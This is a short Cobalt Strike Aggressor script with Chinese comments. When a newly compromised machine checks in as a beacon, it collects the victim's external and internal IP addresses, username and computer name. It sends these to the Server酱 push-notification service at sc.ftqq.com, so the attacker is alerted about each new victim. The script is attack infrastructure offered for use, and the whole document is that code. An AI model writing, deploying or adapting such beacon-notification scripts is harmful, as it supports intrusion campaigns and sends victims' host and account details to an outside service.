# 循环获取所有beacon
on beacon_initial {

	sub http_get {
		local('$output');
		$url = [new java.net.URL: $1];
		$stream = [$url openStream];
		$handle = [SleepUtils getIOHandle: $stream, $null];

		@content = readAll($handle);

		foreach $line (@content) {
			$output .= $line . "\r\n";
		}
		
		println($output);
	}
	#获取ip、计算机名、登录账号
	$externalIP = replace(beacon_info($1, "external"), " ", "_");
	$internalIP = replace(beacon_info($1, "internal"), " ", "_");
	$userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");
	
	#get一下Server酱的链接
	$url = 'https://sc.ftqq.com/接口sckey.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e7%94%a8%e6%88%b7%e4%b8%8a%e7%ba%bf%e5%95%a6%ef%bd%9e%0D%0A%0D%0A%e5%87%ba%e5%8f%a3ip:'.$externalIP.'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
	
	http_get($url);
	
}


